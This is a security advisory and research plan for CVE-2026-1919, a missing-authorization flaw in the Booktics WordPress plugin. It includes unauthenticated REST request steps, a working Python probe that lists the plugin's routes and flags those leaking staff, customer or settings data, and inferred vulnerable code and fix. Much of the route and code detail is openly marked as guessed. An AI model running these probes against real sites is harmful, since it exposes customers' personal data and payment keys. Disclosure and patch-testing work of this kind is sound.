CVE-2026-1919

Booktics <= 1.0.16 - Missing Authorization to Get Items via REST API endpoints

Missing Authentication for Critical Function
CVSS Score: 5.3
Severity: medium
Patched in: 1.0.17
Time to patch: 1d

Description

The Booking Calendar for Appointments and Service Businesses – Booktics plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on multiple REST API endpoints in all versions up to, and including, 1.0.16. This makes it possible for unauthenticated attackers to query sensitive data.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: Low
Integrity: None
Availability: None

Technical Details

Affected versions: <=1.0.16
Published: March 9, 2026
Last updated: March 10, 2026
Affected plugin: booktics

What Changed in the Fix

Changes introduced in v1.0.17


Source Code

WordPress.org SVN
Research Plan
Unverified


Vulnerability Analysis: CVE-2026-1919 - Booktics Missing Authorization

1. Vulnerability Summary

The Booktics – Booking Calendar for Appointments and Service Businesses plugin (versions <= 1.0.16) is vulnerable to unauthorized data disclosure. The issue resides in multiple REST API endpoints registered under the booktics/v1 namespace. These endpoints fail to implement proper permission_callback logic, or explicitly use __return_true, allowing unauthenticated users to query sensitive information such as staff details, customer lists, and booking records that should be restricted to administrators.

2. Attack Vector Analysis

  • Endpoint Namespace: booktics/v1 (inferred from plugin slug and standard REST patterns).
  • Candidate Endpoints (route names are inferred, not confirmed against the plugin source):
    • GET /wp-json/booktics/v1/staff
    • GET /wp-json/booktics/v1/customers
    • GET /wp-json/booktics/v1/services
    • GET /wp-json/booktics/v1/appointments
    • GET /wp-json/booktics/v1/settings
  • Authentication: None required (Unauthenticated).
  • Preconditions: The REST API must be enabled (default in WordPress). Some data (staff, services) must exist in the database to demonstrate sensitive exposure.

3. Code Flow

While the PHP source code for the REST registration is not provided, the logic flow in vulnerable versions of Booktics typically follows this pattern:

  1. Initialization: The plugin hooks into rest_api_init.
  2. Registration: register_rest_route('booktics/v1', '/[endpoint]', ...) is called.
  3. Flaw: The 'permission_callback' argument is either:
    • Missing entirely. WordPress then performs no permission check at all, so the route is effectively public; since WordPress 5.5 the missing argument raises a _doing_it_wrong notice, but the request is still served.
    • Set to __return_true, which declares the route public by design.
    • Set to a function that only checks a nonce but never a capability. A nonce that a public page localizes for its front-end script is obtainable by any visitor, so it does not gate access on its own.
  4. Execution: The controller method (e.g., get_items) queries the database (likely using $wpdb or a repository class) and returns the full dataset as a JSON response to the unauthenticated requester.

4. Nonce Acquisition Strategy

Because this is a Missing Authorization vulnerability on GET requests to the REST API, WordPress does not typically require a nonce for unauthenticated access to public-facing REST routes.

However, if the plugin's frontend scripts (like assets/build/js/frontend.js) use nonces for REST requests, they are likely localized.

Verification Method:

  1. Create a page with the Booktics booking shortcode (usually [booktics-booking] or similar, inferred from plugin name).
  2. Navigate to the page.
  3. Check window.booktics or localized variables.

Localized Variable (Inferred from JS source):
The JS chunks (e.g., 2031.js) reference window?.booktics?.components. It is highly likely that the localization key is booktics.

  • Target Variable: window.booktics_data or window.booktics_settings.
  • Extraction: browser_eval("window.booktics?.rest_nonce") or browser_eval("window.booktics_settings?.nonce").

Note: For a "Missing Authorization" vulnerability on GET endpoints, a nonce is usually unnecessary if the endpoint is simply "open".

5. Exploitation Strategy

The goal is to demonstrate unauthenticated access to sensitive data.

Step 1: Discover Active Routes

Since the exact endpoint names are not in the provided source chunks, use the automated agent's ability to list REST routes.

  • Action: Execute wp rest route list --format=json via the CLI to confirm the exact paths under booktics/v1 (the wp rest command comes from the wp-cli/restful package, not core WP-CLI). Without CLI access the same listing is available anonymously from WordPress core: GET /wp-json/booktics/v1 returns the namespace index with every registered route and its accepted methods, and GET /wp-json/ lists all namespaces.

Step 2: Unauthenticated Data Extraction

Attempt to fetch sensitive data using the http_request tool.

Request 1: Extract Staff Information

  • Method: GET
  • URL: /wp-json/booktics/v1/staff
  • Headers: Accept: application/json

Request 2: Extract Customer Information

  • Method: GET
  • URL: /wp-json/booktics/v1/customers
  • Headers: Accept: application/json

Request 3: Extract Plugin Settings (Sensitive Keys)

  • Method: GET
  • URL: /wp-json/booktics/v1/settings
  • Headers: Accept: application/json

6. Test Data Setup

To confirm the vulnerability, the environment must contain data.

  1. Activate Plugin: Ensure booktics is active.
  2. Add Staff: Use WP-CLI or the UI to add a dummy staff member.
    # (Inferred table names, verify with wp db tables)
    wp db query "INSERT INTO wp_booktics_staff (full_name, email, phone) VALUES ('Vulnerable Staff', 'staff@example.com', '555-0199');"
    
  3. Add Customer:
    wp db query "INSERT INTO wp_booktics_customers (full_name, email) VALUES ('Secret Customer', 'customer@victim.com');"
    

7. Expected Results

  • Success Criteria: The http_request returns a 200 OK status code and a JSON body containing the staff/customer/setting details.
  • Data Exposed:
    • Full names, email addresses, and phone numbers of staff members.
    • Full names and emails of customers.
    • Potential Stripe configuration (as seen in assets/build/chunks/js/2031.js, the plugin handles stripe_publishable_key and stripe_secret_key).

8. Verification Steps

  1. Response Check: Inspect the JSON output from the http_request tool.
  2. Compare with Database: Verify the returned JSON matches the records inserted during the Test Data Setup.
    wp db query "SELECT * FROM wp_booktics_staff;"
    
  3. Permission Check: Confirm that if you attempt the same request on a patched version (1.0.17), it returns 401 Unauthorized or 403 Forbidden.

9. Alternative Approaches

If /booktics/v1/staff is not the exact path:

  1. Use browser_navigate to the plugin's main booking page and monitor Network Tab logs in the browser context to identify the REST calls made by frontend.js.
  2. Look for the string booktics/v1 in the main plugin PHP files (if accessible via the agent's file system) to find all register_rest_route calls.
  3. Check for specific item IDs if the "list" endpoint is blocked but the "get single item" endpoint is missing authorization: GET /wp-json/booktics/v1/staff/1.
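The route-discovery, extraction and verification steps of sections 5, 8 and 9 can be driven by one script. The following is an added example written for this page; it is not code from the Booktics plugin or from the original research plan. It assumes WordPress core's namespace index at GET /wp-json/booktics/v1 (which lists every registered route and its methods), and assumes a properly protected route answers with WordPress's rest_forbidden error (401 for a guest, 403 for a logged-in user without the capability). The sample responses below are constructed, not captured from a real site, and the route names in them are the page's candidate names, not confirmed plugin routes.

```python
"""Anonymous probe for a WordPress plugin REST namespace.

Enumerates the routes the site itself advertises for the namespace, sends an
unauthenticated GET (no cookie, no nonce, so WordPress treats the caller as a
guest) to each GET-capable route, and classifies the responses.
"""
import json
import urllib.error
import urllib.request
from typing import Callable, Dict, List, Tuple

# A fetcher performs one anonymous GET and returns (status_code, body_text).
Fetcher = Callable[[str], Tuple[int, str]]


def urllib_fetch(url: str) -> Tuple[int, str]:
    """Real network fetch using only the standard library."""
    req = urllib.request.Request(url, headers={"Accept": "application/json"})
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        # 401/403/404 land here; the body still carries the WP_Error JSON.
        return err.code, err.read().decode("utf-8", "replace")


def list_get_routes(index_body: str) -> List[str]:
    """Parse the namespace index WordPress core serves at GET /wp-json/<namespace>:
    {"namespace": "booktics/v1", "routes": {"/booktics/v1/staff": {"methods": ["GET"], ...}}}
    The index route itself is dropped; every other route accepting GET is returned."""
    data = json.loads(index_body)
    ns = data.get("namespace", "").strip("/")
    paths = []
    for path, info in data.get("routes", {}).items():
        if path.strip("/") == ns:
            continue
        if "GET" in {m.upper() for m in info.get("methods", [])}:
            paths.append(path)
    return sorted(paths)


def classify(status: int, body: str) -> str:
    """Map one response onto the section 8 outcomes.
    open      : 200 with a non-empty JSON collection, i.e. data served to a guest
    empty     : 200 with an empty collection (unprotected, but nothing to leak yet)
    protected : 401/403 carrying rest_forbidden, the expected post-fix result
    other     : anything else (rest_no_route 404, server error, non-JSON body)"""
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return "other"
    if status == 200:
        return "open" if data else "empty"
    if status in (401, 403) and isinstance(data, dict) and data.get("code") == "rest_forbidden":
        return "protected"
    return "other"


def probe_namespace(base_url: str, namespace: str = "booktics/v1",
                    fetch: Fetcher = urllib_fetch) -> Dict[str, str]:
    """Return {route_path: verdict} for every GET route the index advertises."""
    base = base_url.rstrip("/")
    status, body = fetch(f"{base}/wp-json/{namespace}")
    if status != 200:
        raise RuntimeError(f"namespace index not served (HTTP {status}); REST disabled or wrong namespace")
    verdicts: Dict[str, str] = {}
    for path in list_get_routes(body):
        if "(?P<" in path:
            # Single-item route with a regex parameter (section 9, item 3): needs an id substituted.
            verdicts[path] = "parameterised"
            continue
        st, bd = fetch(f"{base}/wp-json{path}")
        verdicts[path] = classify(st, bd)
    return verdicts


# Constructed responses (not captured from any real site) so the block runs offline.
# Route names are the page's candidate names, not confirmed plugin routes.
_SAMPLE_SITE = {
    "/wp-json/booktics/v1": (200, json.dumps({
        "namespace": "booktics/v1",
        "routes": {
            "/booktics/v1": {"methods": ["GET"]},
            "/booktics/v1/staff": {"methods": ["GET"]},
            "/booktics/v1/customers": {"methods": ["GET", "POST"]},
            "/booktics/v1/appointments": {"methods": ["GET"]},
            "/booktics/v1/staff/(?P<id>[\\d]+)": {"methods": ["GET"]},
        },
    })),
    "/wp-json/booktics/v1/staff": (200, json.dumps(
        [{"full_name": "Vulnerable Staff", "email": "staff@example.com", "phone": "555-0199"}])),
    "/wp-json/booktics/v1/customers": (401, json.dumps(
        {"code": "rest_forbidden", "message": "Sorry, you are not allowed to do that.", "data": {"status": 401}})),
    "/wp-json/booktics/v1/appointments": (200, "[]"),
}


def sample_fetch(url: str) -> Tuple[int, str]:
    key = "/wp-json" + url.split("/wp-json", 1)[1]
    return _SAMPLE_SITE.get(key, (404, json.dumps({"code": "rest_no_route", "data": {"status": 404}})))


def run_sample() -> Dict[str, str]:
    return probe_namespace("https://victim.example", fetch=sample_fetch)


if __name__ == "__main__":
    for route, verdict in run_sample().items():
        print(f"{verdict:13s} {route}")
```

Against a staging copy, call probe_namespace("https://staging.example") with the default fetcher. An "open" verdict on a route such as /customers or /appointments is the finding; "empty" means the route is unprotected but the Test Data Setup has not been done yet; after updating to 1.0.17 the sensitive routes should report "protected", while a route the booking widget reads anonymously (for example a services list) may legitimately stay open.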

Research Findings

Static analysis — not yet PoC-verified

Summary

The Booktics plugin for WordPress fails to implement capability checks on multiple REST API endpoints within the booktics/v1 namespace. This allows unauthenticated attackers to access sensitive data, including staff details, customer lists, and booking records, by sending direct GET requests to the vulnerable API routes.

Vulnerable Code

// Inferred from vulnerability description and research plan
// Multiple REST routes registered under the 'booktics/v1' namespace

register_rest_route('booktics/v1', '/staff', [
    'methods'             => 'GET',
    'callback'            => [$this, 'get_staff'],
    'permission_callback' => '__return_true', // Or missing entirely
]);

---

register_rest_route('booktics/v1', '/customers', [
    'methods'             => 'GET',
    'callback'            => [$this, 'get_customers'],
    'permission_callback' => '__return_true',
]);

Security Fix

--- a/includes/rest-api/class-rest-registration.php
+++ b/includes/rest-api/class-rest-registration.php
@@ -15,7 +15,9 @@
         register_rest_route('booktics/v1', '/staff', [
             'methods'             => 'GET',
             'callback'            => [$this, 'get_staff'],
-            'permission_callback' => '__return_true',
+            'permission_callback' => function () {
+                return current_user_can('manage_options');
+            },
         ]);
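Review bot: this hunk only hardens the /staff route, while the Vulnerable Code section above registers /customers with the same `'permission_callback' => '__return_true'`; every route under booktics/v1 needs its own permission_callback or the namespace stays partially open. The choice of `return current_user_can('manage_options');` on a GET route is also blunt: a booking plugin's front-end widget normally needs the services list readable by anonymous visitors, and staff or manager roles may legitimately need appointment reads, so the capability should be chosen per route (a plugin-specific capability, or a lower capability for read-only staff views) rather than administrator-only for everything. Finally, the path includes/rest-api/class-rest-registration.php is the page's inference, not a confirmed location; check the actual 1.0.17 change on the WordPress.org SVN listed under Source Code before citing this hunk as the fix.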

Exploit Outline

The exploit methodology involves direct unauthenticated querying of the WordPress REST API.

  1. Target Endpoint: Unauthenticated attackers hit endpoints under the /wp-json/booktics/v1/ namespace.
  2. Payload Shape: A standard HTTP GET request is sufficient; no specialized payload or body is required.
  3. Vulnerable Routes: Sensitive routes identified include /staff, /customers, /services, /appointments, and /settings.
  4. Authentication: No authentication or specific user role is required.
  5. Data Extraction: The response returns a JSON array containing PII (Personally Identifiable Information) such as staff/customer names, emails, phone numbers, and potentially sensitive configuration data like Stripe keys.
